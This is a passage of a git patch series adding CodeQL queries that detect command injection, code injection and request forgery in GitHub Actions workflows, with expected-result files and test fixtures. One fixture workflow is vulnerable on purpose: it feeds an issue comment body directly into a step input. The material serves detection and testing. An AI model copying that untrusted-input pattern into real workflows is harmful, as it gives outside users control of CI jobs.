Building a system command from user-controlled sources is vulnerable to insertion of + * malicious code by the user. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision high + * @id actions/command-injection + * @tags actions + * security + * external/cwe/cwe-078 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class CommandInjectionSink extends DataFlow::Node { + CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql new file mode 100644 index 000000000000..3834b0ac0d06 --- /dev/null +++ b/ql/src/Security/CWE-078/CriticalCommandInjection.ql @@ -0,0 +1,44 @@ +/** + * @name Command built from user-controlled sources + * @description Building a system command from user-controlled sources is vulnerable to insertion of + * malicious code by the user. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/command-injection + * @tags actions + * security + * external/cwe/cwe-078 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class CommandInjectionSink extends DataFlow::Node { + CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w +where + MyFlow::flowPath(source, sink) and + w = source.getNode().asExpr().getEnclosingWorkflow() and + ( + w instanceof ReusableWorkflow or + w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + ) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql new file mode 100644 index 000000000000..7ad0e98bc492 --- /dev/null +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -0,0 +1,40 @@ +/** + * @name Code injection + * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary + * code execution. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision high + * @id actions/code-injection + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class CodeInjectionSink extends DataFlow::Node { + CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql new file mode 100644 index 000000000000..5a4bbaca034a --- /dev/null +++ b/ql/src/Security/CWE-094/CriticalCodeInjection.ql @@ -0,0 +1,46 @@ +/** + * @name Code injection + * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary + * code execution. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/code-injection + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class CodeInjectionSink extends DataFlow::Node { + CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w +where + MyFlow::flowPath(source, sink) and + w = source.getNode().asExpr().getEnclosingWorkflow() and + ( + w instanceof ReusableWorkflow or + w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + ) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 9e94968e280c..1e7414e5ce6d 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -21,8 +21,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, - ["expression-injection", "command-injection", "request-forgery", "code-injection"]) + externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql new file mode 100644 index 000000000000..3675597fcd74 --- /dev/null +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -0,0 +1,37 @@ +/** + * @name Uncontrolled data used in network request + * @description Sending network requests with user-controlled data allows for request forgery attacks. + * @kind path-problem + * @problem.severity error + * @security-severity 9.1 + * @precision high + * @id actions/request-forgery + * @tags actions + * security + * external/cwe/cwe-918 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class RequestForgerySink extends DataFlow::Node { + RequestForgerySink() { externallyDefinedSink(this, "request-forgery") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof RequestForgerySink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() From f251783c26bb89fdf785de543ec08ce09ef55c26 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 17:47:20 +0100 Subject: [PATCH 119/707] Apply suggestions from code review Co-authored-by: Jorge <46056498+jorgectf@users.noreply.github.com> --- ql/src/Security/CWE-078/CommandInjection.ql | 2 +- ql/src/Security/CWE-078/CriticalCommandInjection.ql | 4 ++-- ql/src/Security/CWE-094/CodeInjection.ql | 4 ++-- ql/src/Security/CWE-094/CriticalCodeInjection.ql | 6 +++--- ql/src/Security/CWE-918/RequestForgery.ql | 2 +- 5 files changed, 9 insertions(+), 9 deletions(-) diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index 2a2225e17b6e..9891f786f7cb 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -34,5 +34,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql index 3834b0ac0d06..5d418ec18161 100644 --- a/ql/src/Security/CWE-078/CriticalCommandInjection.ql +++ b/ql/src/Security/CWE-078/CriticalCommandInjection.ql @@ -6,7 +6,7 @@ * @problem.severity error * @security-severity 9 * @precision high - * @id actions/command-injection + * @id actions/critical-command-injection * @tags actions * security * external/cwe/cwe-078 @@ -40,5 +40,5 @@ where w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) ) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential critical command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql index 7ad0e98bc492..bc2dbffdcdf8 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -20,7 +20,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow private class CodeInjectionSink extends DataFlow::Node { - CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } + CodeInjectionSink() { externallyDefinedSink(this, "code-injection") } } private module MyConfig implements DataFlow::ConfigSig { @@ -36,5 +36,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql index 5a4bbaca034a..2a1e4388d24e 100644 --- a/ql/src/Security/CWE-094/CriticalCodeInjection.ql +++ b/ql/src/Security/CWE-094/CriticalCodeInjection.ql @@ -6,7 +6,7 @@ * @problem.severity error * @security-severity 9 * @precision high - * @id actions/code-injection + * @id actions/critical-code-injection * @tags actions * security * external/cwe/cwe-094 @@ -20,7 +20,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow private class CodeInjectionSink extends DataFlow::Node { - CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } + CodeInjectionSink() { externallyDefinedSink(this, "code-injection") } } private module MyConfig implements DataFlow::ConfigSig { @@ -42,5 +42,5 @@ where w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) ) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential critical code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql index 3675597fcd74..d665a368991d 100644 --- a/ql/src/Security/CWE-918/RequestForgery.ql +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -33,5 +33,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential request forgery in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() From 46afa9c1f3fc771e0430dd2d0101035d2e208048 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 22:41:01 +0100 Subject: [PATCH 120/707] Add new tests --- ql/lib/codeql/actions/dataflow/ExternalFlow.qll | 6 +++--- ql/src/Security/CWE-078/CommandInjection.ql | 1 + .../Security/CWE-078/CriticalCommandInjection.ql | 1 + ql/src/Security/CWE-094/CodeInjection.ql | 1 + ql/src/Security/CWE-094/CriticalCodeInjection.ql | 1 + ql/src/Security/CWE-918/RequestForgery.ql | 1 + ql/test/library-tests/test.expected | 3 +++ .../CWE-078/.github/workflows/comment_issue.yml | 9 +++++++++ .../Security/CWE-078/CommandInjection.expected | 6 ++++++ .../Security/CWE-078/CommandInjection.qlref | 1 + .../CWE-078/CriticalCommandInjection.expected | 6 ++++++ .../CWE-078/CriticalCommandInjection.qlref | 1 + .../Security/CWE-094/CodeInjection.expected | 14 ++++++++++++++ .../Security/CWE-094/CodeInjection.qlref | 1 + .../CWE-094/CriticalCodeInjection.expected | 14 ++++++++++++++ .../Security/CWE-094/CriticalCodeInjection.qlref | 1 + .../CWE-094/CriticalExpressionInjection.expected | 10 ---------- .../Security/CWE-094/ExpressionInjection.expected | 10 ---------- .../Security/CWE-918/.github/workflows/test.yml | 10 ++++++++++ .../Security/CWE-918/RequestForgery.expected | 6 ++++++ .../Security/CWE-918/RequestForgery.qlref | 1 + 21 files changed, 81 insertions(+), 23 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml create mode 100644 ql/test/query-tests/Security/CWE-078/CommandInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-078/CommandInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-094/CodeInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-094/CodeInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml create mode 100644 ql/test/query-tests/Security/CWE-918/RequestForgery.expected create mode 100644 ql/test/query-tests/Security/CWE-918/RequestForgery.qlref diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 7e265fb2570d..08f8b6b93630 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -86,8 +86,10 @@ predicate externallyDefinedStoreStep( ) } -predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { +predicate externallyDefinedSink(DataFlow::Node sink, string kind) { exists(Uses uses, string action, string version, string input | + sinkModel(action, version, input, kind) and + uses.getCallee() = action.toLowerCase() and ( if input.trim().matches("env.%") then sink.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) @@ -96,8 +98,6 @@ predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { then sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) else none() ) and - sinkModel(action, version, input, kind) and - uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" then uses.getVersion() = any(string v) diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index 9891f786f7cb..bdc341e8caf1 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -13,6 +13,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql index 5d418ec18161..dddbd142873f 100644 --- a/ql/src/Security/CWE-078/CriticalCommandInjection.ql +++ b/ql/src/Security/CWE-078/CriticalCommandInjection.ql @@ -13,6 +13,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql index bc2dbffdcdf8..3bac9cec348d 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -15,6 +15,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql index 2a1e4388d24e..64d8a6e43286 100644 --- a/ql/src/Security/CWE-094/CriticalCodeInjection.ql +++ b/ql/src/Security/CWE-094/CriticalCodeInjection.ql @@ -15,6 +15,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql index d665a368991d..228c94f383b9 100644 --- a/ql/src/Security/CWE-918/RequestForgery.ql +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index df8c6ddf9cda..5395fe824535 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -315,6 +315,9 @@ scopes sources | ahmadnassri/action-changed-files | * | output.files | pull_request_target | PR changed files | | ahmadnassri/action-changed-files | * | output.json | pull_request_target | PR changed files | +| amannn/action-semantic-pull-request | * | output.error_message | pull_request_target | PR title | +| cypress-io/github-action | * | env.GH_BRANCH | pull_request_target | PR branch | +| dawidd6/action-download-artifact | * | output.artifacts | * | Artifact details | | dorny/paths-filter | * | output.changes | pull_request_target | PR changed files | | franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | pull_request_target | PR body | | franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | pull_request_target | PR title | diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml b/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml new file mode 100644 index 000000000000..4b6888449c00 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml @@ -0,0 +1,9 @@ +on: issue_comment + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: ruby/setup-ruby@v2 + with: + ruby-version: ${{ github.event.comment.body }} diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected new file mode 100644 index 000000000000..decabad082fb --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref new file mode 100644 index 000000000000..e38b88f29197 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref @@ -0,0 +1 @@ +Security/CWE-078/CommandInjection.ql diff --git a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected new file mode 100644 index 000000000000..8a3d19402b7c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential critical command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref new file mode 100644 index 000000000000..ceb027c8058d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref @@ -0,0 +1 @@ +Security/CWE-078/CriticalCommandInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected new file mode 100644 index 000000000000..4ef832d9d22e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -0,0 +1,14 @@ +edges +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | +nodes +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | +subpaths +#select +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref new file mode 100644 index 000000000000..fe9adbf3b64d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref @@ -0,0 +1 @@ +Security/CWE-094/CodeInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected new file mode 100644 index 000000000000..697cf2a310e8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected @@ -0,0 +1,14 @@ +edges +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | +nodes +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | +subpaths +#select +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref new file mode 100644 index 000000000000..05ef02c50948 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref @@ -0,0 +1 @@ +Security/CWE-094/CriticalCodeInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index aa9d9ae2fc43..8236c4d78291 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected @@ -3,7 +3,6 @@ edges | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | @@ -64,15 +63,10 @@ nodes | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | @@ -201,14 +195,10 @@ nodes subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | steps.remove_quotations.outputs.replaced | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential 